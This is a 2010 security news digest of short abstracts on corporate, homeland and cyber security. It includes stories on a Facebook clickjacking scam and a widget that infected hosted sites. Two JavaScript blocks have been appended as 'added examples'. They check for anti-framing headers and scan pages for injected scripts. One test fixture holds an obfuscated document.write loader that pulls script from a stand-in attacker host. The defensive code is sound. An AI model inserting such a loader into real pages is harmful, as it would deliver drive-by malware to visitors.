
Friday, August 20, 2010

Security Management Weekly - August 20, 2010

Corporate Security

  1. "Business Leader Speaks Out About Employee Theft"
  2. "Guard Suspended for Tackling Deaf Shoplifting Suspect" Los Angeles
  3. "Just 5 Percent of High Street Retailers Are PCI Compliant" Payment Card Industry; United Kingdom
  4. "Under Threat From Mexican Drug Cartels, Reporters Go Silent" Mexico
  5. "Apple Manager Charged with Taking Kickbacks"
Homeland Security

  1. "Caller Sought Whose Hijack Threat Grounded Flight" San Francisco
  2. "India Testing Ways to Access BlackBerry Emails: Source"
  3. "DHS Examines Behavior of Biological, Chemical Agents in Subways" Boston
  4. "Terrorist Tapes Found Under CIA Desk"
  5. "'Border Bill' Only Starts to Solve Security Issues"
Cyber Security

  1. "NIST Is Nearly Ready to Pick the Next Hash Algorithm" National Institute of Standards and Technology
  2. "Clickjacking Threat Punts Facebook Survey Scam"
  3. "Chasm Between Expectation and Reality in Public-Private Cybersecurity Info Sharing"
  4. "Employees Still Pose Biggest Security Threat, Survey Finds"
  5. "Malicious Widget Hacked Millions of Web Sites"


Business Leader Speaks Out About Employee Theft
Gainesville Sun (FL) (08/20/10) Voyles, Karen

Freddie Wehbe, owner of the Gator Domino's franchise in Florida, recently spoke to the Gainesville Area Chamber of Commerce about employee-theft prevention. According to Wehbe, his business lost more than $10,000 to an employee who was able to manipulate how pizzas were accounted for and paid for. To keep such an incident from repeating itself, Wehbe says he now requires drug testing and background checks for all employees and has hired an auditor. Other business leaders also recommend installing and using security cameras as well as physical controls such as locks on storage areas. The FBI has identified employee theft as the fastest-growing crime in America. The Association of Certified Fraud Examiners has determined that 7 percent of a business's gross sales revenue is lost to internal theft or shrinkage, and that the average organization loses more than $9 a day per employee to fraud and abuse. According to the U.S. Chamber of Commerce, nearly a third of all business failures are directly related to employee theft.


Guard Suspended for Tackling Deaf Shoplifting Suspect
CNN.com (08/19/10) Duke, Alan

A security guard at a Forever 21 store in Los Angeles has been suspended indefinitely after he allegedly used excessive force against a deaf shoplifting suspect earlier this month. The suspension stems from an incident that took place on Aug. 7, in which the security guard tackled 28-year-old Alejandro Rea after the store's alarms indicated that he had stolen an item. Witnesses have said that the security guard put Rea in a choke hold that was so strong that he went limp and turned purple. Those who witnessed the incident also said that Rea was trying to communicate with the guard that he was submitting. The security guard then allegedly took Rea back into the store's office and threw him against the wall, injuring him. Pablo Rea, who is Alejandro's brother and was one of the individuals who witnessed the incident, said the amount of force used by the guard was unnecessary because Alejandro could not hear the alarms or the guard's commands to stop. Pablo Rea added that the security guard should have simply tapped Alejandro on the shoulder to get his attention.


Just 5 Percent of High Street Retailers Are PCI Compliant
Online Recruitment (08/17/10)

High street retailers in the United Kingdom do not take payment card security seriously enough, according to payment industry experts who participated in a recent roundtable discussion on the PCI Data Security Standard (PCI DSS). For example, consultant Graham Boler noted that only about 5 percent of high street retailers have complied with PCI DSS. Meanwhile, only 9 percent of Level 1 U.K. retailers, those that handle 6 million transactions or more per year, were compliant with PCI DSS, according to figures released by Visa. In an effort to encourage more retailers to adopt PCI DSS, Visa is raising the fees it charges for data breaches. Although the number of British retailers that comply with PCI DSS is still small, a growing number are taking steps to protect consumers' payment card data. For example, the number of companies that said they stored card authentication data (which PCI DSS forbids retaining after authorization) fell by 2.5 percent in January this year.


Under Threat From Mexican Drug Cartels, Reporters Go Silent
Los Angeles Times (08/16/10) Wilkinson, Tracy

Many Mexican reporters have stopped covering the escalating drug war in Mexico due to threats from the cartels while others have begun publishing only the stories that the cartels request. Approximately 30 reporters have been killed or have disappeared since President Felipe Calderon launched a military-led offensive against the country's powerful drug cartels in December 2006. This violence appears to be getting worse following the July 26 kidnapping of four reporters. In fact, the situation is so severe that the United Nations has sent its first mission to Mexico to examine dangers to freedom of expression. The reporters themselves are also mobilizing, gathering on Aug. 7 to demonstrate against the killings and demand safer working conditions. When asked to comment on the ongoing violence an unnamed editor in Reynosa, Tamaulipas, said, "We don't like the silence. But it's survival." Social media has stepped up to fill the silence through Twitter and anonymous blogs, but residents say that such sources are too often unreliable because they are overtaken by drug traffickers hoping to spread further panic.


Apple Manager Charged with Taking Kickbacks
Reuters (08/16/10) Shumaker, Lisa

Paul Shin Devine, a global supply manager at Apple Inc. since 2005, has been charged with taking kickbacks in exchange for leaking corporate secrets to Asian companies that supplied iPhone and iPod accessories. He is also facing a civil suit filed by Apple, which accuses him of receiving more than $1 million in payments and bribes after using his position within the company to obtain confidential information that he shared with suppliers. He was charged in a federal grand jury indictment with 23 counts of wire fraud, money laundering, conspiracy, and accepting kickbacks.




Caller Sought Whose Hijack Threat Grounded Flight
Associated Press (08/20/10)

Investigators are looking into a hoax threat that was made against an American Airlines flight from San Francisco to New York on Thursday. According to police, a clerk at a business in the San Francisco suburb of Alameda received an anonymous phone call from someone who threatened the flight on Thursday morning. The clerk reported the threat to the police at about 9 a.m., though the flight was allowed to leave the gate about an hour later. Several minutes later, the plane was ordered to taxi to a remote section of the tarmac, where it sat for several hours. The plane was then searched, and two passengers on board--a man and a woman who were reportedly from Pakistan--were taken off the aircraft in handcuffs. The FBI refused to say why the two passengers were taken off the plane, though the couple said that authorities told them that they had been chosen at random for questioning. Meanwhile, the other passengers onboard were taken off the plane and were screened by San Francisco police officers. The FBI eventually determined that the threat was a hoax, and all the passengers on board--including the couple that had been handcuffed--were allowed to rebook their flights.


India Testing Ways to Access BlackBerry Emails: Source
Reuters (08/19/10) Majumdar, Bappa

A technical team from BlackBerry maker Research in Motion (RIM) is in New Delhi helping the Indian government determine how it can access encrypted messages sent by users of the smartphone. According to RIM, the only point at which the Indian government could intercept BlackBerry Enterprise e-mail is while a message is temporarily held in decrypted form on a customer's BlackBerry Enterprise Server (BES). The messages cannot be decrypted anywhere else along the path, since the keys are generated and held by the customer's own server and RIM holds no master key for the systems in its network. As a result, Indian authorities are trying to determine whether they have the technical capability to access BlackBerry Enterprise e-mail while it is stored on the server. The effort comes less than two weeks ahead of RIM's Aug. 31 deadline to provide the Indian government with the ability to read BlackBerry Enterprise e-mail as well as messages sent via the BlackBerry Messenger service. India has said that it needs to be able to access the messages in order to prevent militants from using the BlackBerry network as a tool in carrying out terrorist attacks. If RIM fails to provide India with a solution for accessing the messages by Aug. 31, BlackBerry services in the country will be shut down.


DHS Examines Behavior of Biological, Chemical Agents in Subways
Homeland Security Today (08/10) McCarter, Mickey

The Department of Homeland Security in August is planning to conduct tests in Boston to help improve defenses against terrorist attacks on the nation's subway systems. During the tests, DHS will release a non-toxic gas and particle tracers in Boston's subway system to determine how airborne particles from biological or chemical agents released in a terrorist attack behave. In the previous phase of the test, which was conducted in Boston in December, DHS found that biological and chemical agents were capable of quickly spreading through a subway system. In addition, the first phase of the test found that biological and chemical agents behaved differently underground than they did above ground. For example, DHS noticed that biological agents that were released underground would cling to surfaces, while chemical agents in the form of gas would drift around corners. DHS hopes to use the results from the test for a variety of purposes, including developing evacuation, ventilation, and incident response plans. In addition, DHS hopes the test results will be used to develop systems that are capable of detecting chemical and biological agents.


Terrorist Tapes Found Under CIA Desk
Associated Press (08/17/10)

The CIA has revealed the existence of video and audio tapes of Sept. 11 plotter Ramzi Binalshibh being interrogated in a secret prison in Morocco. The taped interviews, which provided the CIA with intelligence about a terrorist plot to crash aircraft into London's Heathrow Airport, were discovered in a box under a desk in the CIA's Counterterrorism Center in 2007. The Justice Department is now looking into why the government told federal judges that the tapes did not exist. The discovery of the tapes could make it difficult for the U.S. to prosecute Binalshibh for his role in the Sept. 11 attacks. In addition, the tapes could provide information about Morocco's role in a CIA counterterrorism program that allowed the agency to detain terrorists in secret prisons and send them to other countries. Morocco's role in that program has been criticized because the African nation's prisons have a history of torture, forced disappearances, poor conditions, and sexual violence. Morocco's security forces have also been accused of torturing detainees. However, U.S. officials have said that waterboarding and other harsh interrogation techniques were not used in the Morocco prison, and that the facility was only used to hold detainees for several months. But much of the information contained in the tapes might not ever be revealed in court, since Binalshibh has asked to plead guilty and will not likely be tried.


'Border Bill' Only Starts to Solve Security Issues
Daily Caller (08/16/10) Boyle, Matthew

President Obama signed a bill on Aug. 13 that will provide $600 million in additional funding for 1,500 new agents and new unmanned surveillance drones along the U.S.-Mexico border. However, some members of Congress say the bill must only be seen as the start of a long-term border security solution. Phil Jordan, former director of the El Paso Intelligence Center (EPIC), supports this position, saying that the border security issue cannot be solved merely by throwing in millions in funding and resources. "After the elections, the fear-mongers and [Arizona Sen. John] McCains of the world will put it [border security] on the back-burner and forget about it," he said. "Fear-mongering can only help the drug cartels organize crime because it redirects resources to places where they're ineffective. Washington has always disregarded the border until elections." Jordan recommends redirecting all National Guard resources to federal agencies operating in the area because the National Guard is not empowered to arrest suspects. He also says that the federal government needs to be aware that al-Qaida is well positioned to take advantage of Mexico's political and social instability by crossing the porous U.S.-Mexico border.




NIST Is Nearly Ready to Pick the Next Hash Algorithm
Government Computer News (08/18/10) Jackson, William

Developers of the 14 semifinalist algorithms for the new SHA-3 Secure Hash Algorithm standard will defend their work at the second U.S. National Institute of Standards and Technology (NIST) candidate conference. The final selection of a new standard hashing algorithm for the federal government is expected by early 2012, says NIST's Bill Burr. "All in all we've got quite a bit of performance data," Burr says. "At this point, we have a surprising amount of data on hardware implementation on all 14 candidates." SHA-3 will augment, not replace, the algorithms specified in Federal Information Processing Standard 180-2: SHA-1 and the SHA-2 family (SHA-224, SHA-256, SHA-384, and SHA-512). The conference will give the entrants an opportunity to address the results of the analysis and testing carried out over the past year. The field of 14 will eventually be narrowed to five finalists, which will be analyzed and tested again before the final choice is made in the winter of 2012.


Clickjacking Threat Punts Facebook Survey Scam
The Register (UK) (08/18/10) Leyden, John

Sophos is warning Facebook users to beware of a new scam circulating on the social networking site. The scam uses Facebook fan pages with eye-catching content that load script from an external domain into the visitor's browser. That script causes victims, without their knowledge, to share the fan page with their friends and contacts on Facebook, luring other people into the scam. In addition, the fan pages ask victims to complete a survey before they can view the page's content. It is believed that those behind the scam are paid by shady marketing firms each time a user completes one of the surveys. Victims are also asked to enter their cell phone numbers to enroll in a subscription service that automatically renews at $5 per week. Victims generally do not realize that they are enrolling in an automatically renewing subscription, since the terms and conditions of enrollment are buried in fine print on the fan page. Meanwhile, Facebook has been working to stop the scam by deleting the fraudulent fan pages, and Sophos has blocked the domain hosting the malicious code used in the scam.
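The precondition for clickjacking a "share" or "like" control is that a third-party page can load the target page inside an iframe. The following is an added example, not code from the article, Sophos or Facebook: a Node.js check that reads a page's raw HTTP response headers and decides whether a given attacker origin is allowed to frame it, honouring Content-Security-Policy frame-ancestors (which takes precedence) and X-Frame-Options. The origins (app.example, evil.example, trusted.example) and all header values are constructed for the example.

```javascript
// Added example: decide from raw response headers whether `attackerOrigin`
// may load the page served from `pageOrigin` inside an <iframe>. All header
// values and origins used below are constructed for this example.

function parseHeaders(raw) {
  // Case-insensitive header map; repeated headers are kept in order.
  const out = {};
  for (const line of raw.split(/\r?\n/)) {
    const i = line.indexOf(':');
    if (i < 0) continue; // status line or blank line
    const name = line.slice(0, i).trim().toLowerCase();
    if (!out[name]) out[name] = [];
    out[name].push(line.slice(i + 1).trim());
  }
  return out;
}

// Does one CSP source expression admit `origin`? Supports 'self', 'none', *,
// exact origins and host wildcards such as https://*.trusted.example.
function cspSourceMatches(src, origin, pageOrigin) {
  if (src === "'self'") return origin === pageOrigin;
  if (src === "'none'") return false;
  if (src === '*') return true;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+))?$/i.exec(src);
  if (!m) return false;
  const [, scheme, wild, host, port] = m;
  const o = new URL(origin);
  const oPort = o.port || (o.protocol === 'https:' ? '443' : '80');
  if (scheme && scheme.toLowerCase() !== o.protocol.slice(0, -1)) return false;
  if (port && port !== oPort) return false;
  const h = host.toLowerCase();
  return wild ? o.hostname.endsWith('.' + h) : o.hostname === h;
}

// Returns { frameable, reason } for an attempt by attackerOrigin to frame the
// page served from pageOrigin with these headers.
function framingAllowed(rawHeaders, pageOrigin, attackerOrigin) {
  const h = parseHeaders(rawHeaders);

  // A CSP frame-ancestors directive overrides X-Frame-Options when both are sent.
  for (const policy of h['content-security-policy'] || []) {
    const dir = policy.split(';').map(s => s.trim())
      .find(s => /^frame-ancestors\b/i.test(s));
    if (!dir) continue;
    const sources = dir.split(/\s+/).slice(1);
    const ok = sources.some(s => cspSourceMatches(s, attackerOrigin, pageOrigin));
    return { frameable: ok, reason: 'CSP ' + dir };
  }

  const xfo = (h['x-frame-options'] || [])[0];
  if (xfo !== undefined) {
    const v = xfo.toUpperCase();
    if (v === 'DENY') return { frameable: false, reason: 'X-Frame-Options: DENY' };
    if (v === 'SAMEORIGIN') {
      return { frameable: attackerOrigin === pageOrigin, reason: 'X-Frame-Options: SAMEORIGIN' };
    }
    // ALLOW-FROM was never implemented by every browser, and browsers that do
    // not understand a value ignore the header, so treat both as no protection.
    return { frameable: true, reason: 'unreliable X-Frame-Options value "' + xfo + '"' };
  }
  return { frameable: true, reason: 'no anti-framing header' };
}

// Constructed samples: the no-header default that was common in 2010, and a
// hardened page that allows only itself and *.trusted.example to frame it.
const UNPROTECTED = 'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n';
const HARDENED =
  'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n' +
  "Content-Security-Policy: default-src 'self'; frame-ancestors 'self' https://*.trusted.example\r\n" +
  'X-Frame-Options: SAMEORIGIN\r\n';

for (const [name, headers] of [['unprotected', UNPROTECTED], ['hardened', HARDENED]]) {
  const r = framingAllowed(headers, 'https://app.example', 'https://evil.example');
  console.log(name + ': frameable by https://evil.example = ' + r.frameable + ' (' + r.reason + ')');
}
```

Run it over the headers of any page that renders a one-click action (share, like, follow, purchase); a result of `frameable: true` for an untrusted origin means the control can be overlaid by a transparent iframe on an attacker's page. Frame-busting JavaScript is not a substitute, since it can be defeated by sandboxed iframes and navigation tricks; the header-based controls above are what a browser enforces.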


Chasm Between Expectation and Reality in Public-Private Cybersecurity Info Sharing
Fierce Government IT (08/18/10) Perera, David

A recent Government Accountability Office (GAO) report found that nearly all private-sector representatives who participate in federal public-private cybersecurity information sharing expect the government to share information with them in a timely manner. However, only 27 percent of the 56 representatives surveyed said they were receiving a great or moderate amount of such information. Eighty-seven percent of private-sector representatives also said they expected access to classified or sensitive information, while 16 percent said they received it. Additionally, 78 percent said they expect a secure information-sharing mechanism, but only 21 percent said such a mechanism is in use. In response to the GAO report, Department of Homeland Security officials voiced concern that sharing sensitive information with the private sector could cause it to be distributed openly and globally. They explained that because the restrictions placed on the United States Computer Emergency Readiness Team (US-CERT) do not allow it to make distinctions between private-sector entities, it is difficult for the organization to formally share specific information.


Employees Still Pose Biggest Security Threat, Survey Finds
NextGov.com (08/17/10) Aitoro, Jill R.

Agency workers pose the greatest threat to cybersecurity, giving foreign entities and other perpetrators entry to sensitive networks, according to the findings of a PacketMotion survey of security professionals. The majority of the 22 federal security experts polled cited employees as the most likely to swipe sensitive data, because failure to adhere to policies combined with lax oversight often permits easy access to data. The survey's findings reflect "the reality that the [perpetrator] will hijack or use the credentials of internal users," says PacketMotion's Jonathan Gohstand. Nearly six in 10 survey respondents said employees constitute the biggest threat to the federal enterprise computing environment, and 14 percent also named administrators who have been given access to certain networks and files. Eighteen percent said contractors and other outsiders were the most prevalent security threat, while just 9 percent named hackers and cybercrooks.


Malicious Widget Hacked Millions of Web Sites
Computerworld (08/16/10) Keizer, Gregg

As many as 5 million Web sites hosted by Network Solutions may be infected with malware and may be pushing that malware onto visitors' machines, according to Armorize Technology researchers. Armorize's Wayne Huang says the source of the infections is a widget that Network Solutions installed on its GrowSmartBusiness.com Web site. The widget was also automatically installed on parked domains hosted by Network Solutions, Huang notes. When users visited one of these sites, the domain launched a drive-by attack that ran the "Nuke" exploit toolkit against Internet Explorer, Firefox, Chrome, and Opera. If the toolkit successfully exploited the browser, a Trojan downloader was placed on computers running Windows. Users' searches were also redirected and pop-up advertisements began appearing on their screens. The motivation for the attack may have been financial, since the attackers were making money from the ads that appeared on victims' screens, Huang says. Meanwhile, Network Solutions, which disputes Armorize's assertion that 5 million of its Web sites are infected with malware, has disabled the widget on its parked domains and has taken GrowSmartBusiness.com offline.
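The pattern here, one provider-installed widget pulling attacker-controlled script into millions of pages, is found by inventorying what each hosted page loads rather than by looking at any one page. The following is an added example, not code from the article, Armorize or Network Solutions: a Node.js pass over a set of pages that lists every external script source, flags origins not on the hosting provider's allowlist, flags inline scripts shaped like drive-by loaders, and counts how many distinct pages each unlisted origin appears on. The pages, the allowlist and every hostname (all under `.test`) are constructed for the example and are not the real domains from the incident.

```javascript
// Added example: fleet-wide inventory of third-party script loads. The pages,
// the allowlist and the *.test hostnames below are constructed, not real.

// Captures the src attribute of <script> tags (double-, single- or unquoted).
const SCRIPT_SRC = /<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))[^>]*>/gi;
// Captures the body of <script> tags that have no src attribute.
const INLINE_SCRIPT = /<script\b(?![^>]*\bsrc\s*=)[^>]*>([\s\S]*?)<\/script\s*>/gi;

// Heuristics for injected loaders: scripts that write further tags, or decode
// an obfuscated payload before doing so. Hits are for a human to read; this is triage.
const LOADER_HINTS = [
  /document\.write\s*\([^)]*<\s*(?:script|iframe)/i,
  /unescape\s*\(\s*['"]%3[Cc]/,
  /String\.fromCharCode\s*\(/,
  /\beval\s*\(/,
];

// Returns findings for one page: unlisted third-party script origins,
// unparseable src values, and inline scripts matching a loader heuristic.
function auditPage(pageUrl, html, allowedOrigins) {
  const pageOrigin = new URL(pageUrl).origin;
  const findings = [];

  for (const m of html.matchAll(SCRIPT_SRC)) {
    const src = m[1] ?? m[2] ?? m[3];
    let origin;
    try {
      origin = new URL(src, pageUrl).origin; // resolves relative and scheme-relative srcs
    } catch (e) {
      findings.push({ page: pageUrl, kind: 'unparseable-src', src });
      continue;
    }
    if (origin !== pageOrigin && !allowedOrigins.has(origin)) {
      findings.push({ page: pageUrl, kind: 'unlisted-third-party', src, origin });
    }
  }

  for (const m of html.matchAll(INLINE_SCRIPT)) {
    const hit = LOADER_HINTS.find(re => re.test(m[1]));
    if (hit) findings.push({ page: pageUrl, kind: 'suspicious-inline', hint: String(hit) });
  }
  return findings;
}

function auditSite(pages, allowedOrigins) {
  const all = [];
  for (const [url, html] of Object.entries(pages)) all.push(...auditPage(url, html, allowedOrigins));
  return all;
}

// origin -> number of distinct pages that load it. One origin showing up across
// thousands of parked domains is the signature of a compromised shared widget.
function unlistedOriginsByPageCount(findings) {
  const pagesPerOrigin = {};
  for (const f of findings) {
    if (f.kind !== 'unlisted-third-party') continue;
    if (!pagesPerOrigin[f.origin]) pagesPerOrigin[f.origin] = new Set();
    pagesPerOrigin[f.origin].add(f.page);
  }
  const counts = {};
  for (const [origin, s] of Object.entries(pagesPerOrigin)) counts[origin] = s.size;
  return counts;
}

// Constructed inputs: the provider's own CDN is allowlisted; two parked pages
// carry the provider widget plus an injected attacker script; one customer
// site is clean; one parked page hides the same loader in obfuscated inline JS.
const ALLOWED = new Set(['https://cdn.hosting-provider.test']);
const PARKED_TEMPLATE = [
  '<html><head>',
  '<script src="https://cdn.hosting-provider.test/widget/v1/small-biz.js"></script>',
  '<script src="https://stats.attacker.test/js/w.js"></script>',
  '</head><body><p>This domain is parked.</p></body></html>',
].join('\n');
const PAGES = {
  'http://parked-one.test/': PARKED_TEMPLATE,
  'http://parked-two.test/': PARKED_TEMPLATE,
  'http://customer-site.test/': '<html><head><script src="/js/app.js"></script>' +
    "<script src='https://cdn.hosting-provider.test/analytics.js'></script></head><body>Hi</body></html>",
  'http://parked-three.test/': '<html><body><p>Parked.</p><script type="text/javascript">' +
    "document.write(unescape('%3Cscript src=%22https://stats.attacker.test/js/w.js%22%3E%3C/script%3E'));" +
    '</script></body></html>',
};

const FINDINGS = auditSite(PAGES, ALLOWED);
console.log(FINDINGS);
console.log(unlistedOriginsByPageCount(FINDINGS));
```

Feed it the HTML of each hosted page (fetched with a browser-like User-Agent, since drive-by kits often serve clean content to crawlers) and sort the per-origin counts descending; the allowlist should contain only the provider's own asset hosts, so that a widget that starts fetching from somewhere new surfaces immediately.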


Abstracts Copyright © 2010 Information, Inc. Bethesda, MD

